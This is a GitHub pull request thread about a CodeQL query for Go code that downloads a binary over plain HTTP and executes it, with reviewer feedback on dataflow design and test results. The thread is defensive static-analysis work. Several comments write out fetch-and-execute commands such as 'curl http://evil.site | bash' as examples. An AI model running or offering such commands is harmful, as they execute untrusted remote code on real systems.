Skip to content
This repository was archived by the owner on Jan 5, 2023. It is now read-only.

CWE-311: Download a binary file over plain-HTTP, and then execute it#364

Closed
gagliardetto wants to merge 8 commits intogithub:mainfrom
gagliardetto:curl-bash-over-http
Closed

CWE-311: Download a binary file over plain-HTTP, and then execute it#364
gagliardetto wants to merge 8 commits intogithub:mainfrom
gagliardetto:curl-bash-over-http

Conversation

@gagliardetto
Copy link
Contributor

CWE-311: Missing Encryption of Sensitive Data

This query looks for scenarios where:

  • A (binary) file is downloaded over an unencrypted HTTP connection.
  • Then that file is executed.

The above Go scenario corresponds to the infamous curl -s "http://example.com/hello.bin" | bash


NOTE:

I'm having difficulties to make the query work as expected. The different flows don't align as I expected.

@intrigus-lgtm
Copy link
Contributor

The other languages, codeql supports, only check for insecure downloads of executable files.
For example this is the Javascript query.

Checking only for insecure downloads is far easier than also looking for code that executes the downloaded file.
IMHO: In many cases it also is probably very hard to match a downloaded file and its execution

@gagliardetto
Copy link
Contributor Author

gagliardetto commented Oct 5, 2020

I'm having difficulties to make the query work as expected. The different flows don't align as I expected.

In particular, this should be not be caught because it's OK (there is no execution):

https://github.com/github/codeql-go/pull/364/files#diff-b7f104754b628bc22d73802262efd672R54-R61

This suggests me that there is some huge error(s) in how I wrote the query.

@gagliardetto
Copy link
Contributor Author

Checking only for insecure downloads is far easier than also looking for code that executes the downloaded file.

Yes, it is far easier. That's why it's an interesting challenge to also find the more specific cases where that downloaded file is executed.

But yeah, I'm not sure it's worth the effort. The possible more-focused results that it might yield would still be a subset of the insecure-download query. Is the parent set so big to justify a query for just this subset?

@smowton
Copy link
Contributor

smowton commented Oct 6, 2020

Thanks, this sounds like a good query to have! I'll take a look and see if I can comment usefully on the failing test tomorrow.

fld.hasQualifiedName("net/http", "Response", "Body") and
read = fld.getARead() and
read.readsField(base, fld) and
base.getAPredecessor*() = httpClientCall.(DataFlow::CallNode).getResult(0).getASuccessor*()
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

getAPredecessor*() and getASuccessor*() are redundant (use localFlow instead)

}

/**
* Holds if the provided `file` is the result of a `fileCreationCall`.
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Reword-- there's nothing here to assure us that fileCreationCall is creating the file, only that it returns it.

Rename to callReturnsFile or similar (it hasn't a return value, so is not a getter)

/**
* Holds if the provided `fileCreationCall` had as source the provided `filename`.
*/
predicate getFilename(DataFlow::CallNode fileCreationCall, ValueEntity filename) {
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Similarly, this is a relation not a getter

@smowton
Copy link
Contributor

smowton commented Oct 7, 2020

The reason this doesn't work is because the query asks "is there a path from

func noExecution() {
	remoteURL := "http://example.com/hello.bin"

to an http.Get call (of course there is, the one in downloadFile), and then quite independently whether an argument to downloadFile is used as an argument to exec.Command (it is, in useHTTPS for example). The context (partial call-stack) indicating we got to downloadFile from noExecution is discarded when we pull the (function-local) Node out of the PathNode (which embeds the context), then ask other dataflow questions about that Node.

I'll follow-up with some more practical advice about how to do this shortly.

This way the calling context is maintained throughout.
@smowton
Copy link
Contributor

smowton commented Oct 8, 2020

Here's a branch showing a sketch of my suggested approach: https://github.com/smowton/codeql-go/tree/smowton/draft/insecure-binary-download

In short, we use additional steps and function models to make url-to-http-response-body and file-write-to-filename into steps, and so trace the whole flow in one configuration -- then use subsidiary configurations to make (not 100% effective) consistency checks, like at least one HTTP client request being fed from the same source. This way the whole end-to-end query maintains the needed callstack context and your good and bad examples are distinguished as we might hope.

Feel free to take as much or as little of that draft as you like -- suggested things to check now:

  • Other ways of writing a response body to a file
  • Other ways of insecurely fetching a binary
  • Expand the test suite as needed to cover those

@smowton
Copy link
Contributor

smowton commented Oct 10, 2020

I've measured the performance impact of increasing the number of PostUpdateNodes as is done in that branch. The cost was negligible.

@gagliardetto
Copy link
Contributor Author

Thank you so much for your help, @smowton !

@gagliardetto
Copy link
Contributor Author

gagliardetto commented Oct 15, 2020

Other ways of insecurely fetching a binary

That will be part of the next project I'm working on that will semi-automate the addition of concrete implementations of the codeql concepts (most likely starting with SystemCommandExecution, HTTP, and UntrustedFlowSource).


Do you think this query might be self-sufficient as-is? @smowton

Copy link
Contributor

@smowton smowton left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

OK, sounds good. Have started an all-projects evaluation of this; while we're waiting here are some trivial cleanups, which I appreciate are to a reasonable degree cleaning up my own code :)

Comment on lines 49 to 51
predicate isSink(DataFlow::Node sink, SystemCommandExecution exec) {
sink = exec.getCommandName()
}
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Inline this at its only user

class FlowHttpUrlToClientRequest extends TaintTracking::Configuration {
FlowHttpUrlToClientRequest() { this = "FlowHttpUrlToClientRequest" }

predicate isSource(DataFlow::Node source, StringLit val) { isHttpUrlSource(source, val) }
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Inline these trivial 2-arg getSource methods everywhere

override predicate isSink(DataFlow::Node sink) { this.isSink(sink, _) }
}

predicate isUrlToRequestResponseStep(DataFlow::Node url, DataFlow::Node response) {
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Inline this

@smowton
Copy link
Contributor

smowton commented Oct 16, 2020

Am just investigating the test situation, which relates to my introducing new PostUpdateNodes. If this is very time-consuming I can back that change out (causing some BAD cases here to not be detected for now) and follow up; I'll let you know which way I want to go by the end of the day.

@smowton
Copy link
Contributor

smowton commented Oct 16, 2020

Result: there were 6 true-positive results, but none of them involved actually saving the response to a file and running it -- rather, they all involved directly executing (part of) the retrieved body. Suggest rephrasing the help and description to make clear the save-to-file step, which is currently universal, is not necessary.

gagliardetto and others added 2 commits October 16, 2020 14:29
Co-authored-by: Chris Smowton <smowton@github.com>
@gagliardetto
Copy link
Contributor Author

Result: there were 6 true-positive results, but none of them involved actually saving the response to a file and running it -- rather, they all involved directly executing (part of) the retrieved body.

Oh, you mean something like evaluating a script directly from the command line without passing through a file medium?

I'm not sure I follow here; if results were found, does that mean that the query does not require a save-to-file step? I don't exactly understand the logic of the query anymore 😅

@smowton
Copy link
Contributor

smowton commented Oct 16, 2020

Save-to-file makes sense -- it's like the difference between

fname=$(mktemp)
curl http://evil.site > fname # Taints fname
./fname # Runs tainted filename

vs. simply

bash -c $(curl http://evil.site)

Both of those are a problem, it just so happens that the existing cases are all like the latter one.

As to the logic of the query-- it's just ordinary existing taint-flow modelling, starting from an http URL and ending at an execution site, with extra rules that os.Create conducts taint from the file body to the file name created and that Client.Get etc conduct taint from the URL to the result. The ancillary config the just checks for flow up to a Client.Get is to avoid a FP in the case where an http URL is not fetched but we somehow think it made it to an execution call regardless.

@sauyon
Copy link
Contributor

sauyon commented Oct 16, 2020

Two high-level comments; I haven't looked at the code:

  • Can you add the examples to the test directory?
  • We should probably add any request to an unencrypted URL as an untrusted flow source. It's complicated somewhat by the fact that it requires a flow configuration as it is, but maybe local taint and simple flow through calls will do the trick for most cases.

@smowton
Copy link
Contributor

smowton commented Oct 16, 2020

Re: the last bit, I'd suggest we merge this as-is and then generalise it as a separate PR when moving this out of the experimental directory

@smowton
Copy link
Contributor

smowton commented Oct 16, 2020

@gagliardetto I checked out the test alterations, and it looks like there's trouble introduced by the expansion of PostUpdateNodes after all. Please revert that change and annotate any tests that don't yet work with // BAD (but not detected): we don't yet model taint flow out of a function through immutable argument types like 'string'

@github github deleted a comment Jun 8, 2021
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.

Labels

None yet

Projects

None yet

Development

Successfully merging this pull request may close these issues.

4 participants